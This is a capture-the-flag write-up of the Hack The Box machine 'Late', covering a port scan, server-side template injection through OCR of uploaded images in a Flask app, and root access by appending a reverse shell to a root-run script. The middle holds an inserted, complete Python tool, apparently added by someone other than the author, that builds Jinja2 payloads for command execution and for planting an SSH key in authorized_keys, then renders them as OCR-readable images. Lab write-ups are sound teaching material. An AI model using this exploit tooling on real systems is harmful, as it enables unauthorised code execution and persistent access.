CREATE & DESTROY

Late | Hack The Box

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Out of the blocks we don’t have a lot to go on: just SSH and an nginx web server. So straight to the web app to see if we can break something. The landing page points us at a subdomain (images.late.htb), so we add it to /etc/hosts and have a look.

If we try to bypass the upload filter with a PHP file renamed to .jpg, we get the following error. It leaks the file’s location and the stack behind the app, but there is no hope of a PHP reverse shell here.

The error page tells us the site is a Flask app running an OCR script over the uploaded image, so whatever text the OCR extracts most likely ends up in a Jinja2 template. That makes server-side template injection (SSTI) via the image contents the obvious thing to try. Uploading an image containing an SSTI probe as text gives us the following…

After many failed attempts to execute commands I finally realise the issue is not a filter but the OCR failing to read the input properly. If we strip the {{ }} tags we can see exactly what the OCR is reading back, and after a lot of trial and error we find a typeface, size and kerning combination that gets the payload through intact and gives us code execution.

We can execute commands, but we can’t get the box to talk back to us (curl, ping and nc all fail). SSH is open, though, and we know which user the app runs as, so what if…
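Putting the OCR tuning and the SSH idea together, here is an added example (my code, not the author’s) that builds the Jinja2 payload, reports which glyphs OCR tends to mangle, and renders the text one glyph at a time with manual kerning so typeface, size and spacing can be iterated on locally instead of by re-uploading. It assumes Pillow is installed, that a DejaVu Sans Mono TTF lives at the path shown, that the app is stock Flask (so the config.__class__ gadget reaches os and the builtins), and that the post’s hint means writing to the user’s authorized_keys; the home directory and public key are placeholders, none of which are stated in the post.

```python
"""Build a Jinja2 SSTI payload and render it as an OCR-friendly image.

Added example, not code from the original post. Assumptions (not on the page):
  - Pillow is installed (pip install pillow) for the rendering step;
  - a monospaced TTF exists at FONT_PATH (DejaVu Sans Mono is a guess);
  - the app is stock Flask, so `config` is a flask.config.Config and its
    module globals contain `os` and the builtins;
  - TARGET_HOME and PUBKEY are placeholders for the real user and key.
"""
from __future__ import annotations

FONT_PATH = "/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf"  # assumption
TARGET_HOME = "/home/USER"                                          # placeholder
PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA... attacker@kali"    # placeholder

# Glyphs OCR engines most often drop or confuse; a payload is checked against
# this set so you know exactly which characters the typeface has to get right.
OCR_RISKY = set("{}[]_'\"|`")


def ssti_run(cmd: str) -> str:
    """Jinja2 expression that runs `cmd` through os.popen and returns stdout.
    flask.config does `import os`, so Config.__init__.__globals__['os'] exists."""
    return "{{ config.__class__.__init__.__globals__['os'].popen(%r).read() }}" % cmd


def ssti_append(path: str, line: str) -> str:
    """Jinja2 expression that appends `line` (plus newline) to `path` through
    the interpreter's builtin open(). Aimed at ~/.ssh/authorized_keys this turns
    template injection into an SSH login, which is what the post hints at."""
    builtins = "config.__class__.__init__.__globals__['__builtins__']"
    return "{{ %s['open'](%r, 'a').write(%r) }}" % (builtins, path, line + "\n")


def risky_chars(payload: str) -> list[str]:
    """Sorted list of characters in `payload` that OCR is likely to mangle."""
    return sorted({c for c in payload if c in OCR_RISKY})


def render_payload(payload: str, out_path: str, *, size: int = 48,
                   spacing: int = 8, pad: int = 24) -> str:
    """Draw `payload` black-on-white, one glyph at a time with `spacing` extra
    pixels between glyphs (manual kerning), and save it as a PNG. Pillow is
    imported here so the payload builders above work without it installed."""
    from PIL import Image, ImageDraw, ImageFont  # assumption: Pillow available

    font = ImageFont.truetype(FONT_PATH, size)
    advance = int(font.getlength("M")) + spacing   # fixed advance per glyph
    img = Image.new("RGB", (pad * 2 + advance * len(payload), pad * 2 + size * 2), "white")
    draw = ImageDraw.Draw(img)
    x = pad
    for ch in payload:
        draw.text((x, pad), ch, font=font, fill="black")
        x += advance
    img.save(out_path)
    return out_path


def ocr_roundtrip(image_path: str, expected: str) -> bool | None:
    """Read the image back with a local tesseract and compare to `expected`
    ignoring whitespace, so typeface/size/spacing can be tuned offline instead
    of by re-uploading. Returns None when pytesseract is not installed."""
    try:
        import pytesseract
        from PIL import Image
    except ImportError:
        return None
    text = pytesseract.image_to_string(Image.open(image_path))
    return "".join(text.split()) == "".join(expected.split())


if __name__ == "__main__":
    payload = ssti_append(TARGET_HOME + "/.ssh/authorized_keys", PUBKEY)
    print("payload:", payload)
    print("glyphs to watch:", "".join(risky_chars(payload)))
    png = render_payload(payload, "payload.png")
    print("wrote", png, "local OCR matches:", ocr_roundtrip(png, payload))
```

The per-glyph drawing is the point: a normal text call lets the font’s own kerning pull braces and underscores together, which is exactly what the OCR choked on, while a fixed advance keeps every glyph isolated. Run ocr_roundtrip against the rendered PNG and adjust size and spacing until it returns True before uploading.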

Well there we go, that’ll be a way in.

Without a password we can’t run sudo -l, so I upload my usual helpers (LinPEAS and pspy) and see what’s going on; if nothing turns up I’ll go through the filesystem by hand.

LinPEAS tells us we have write privileges on a script inside a $PATH directory, and pspy shows root running it regularly. The file has chattr +a set (append-only), so we can’t overwrite it or edit it in place, but we can append to it, so we can just append a reverse shell to the bottom and see what happens…

It’s being rewritten every minute, so we have to move fast: start the listener first, then append.

There we go, a shell as root. Get the flag. Box done.

Other than the OCR fiddling with typefaces, this box ended up being straightforward, but it was a nice reminder that HTB does have some easier rooms!
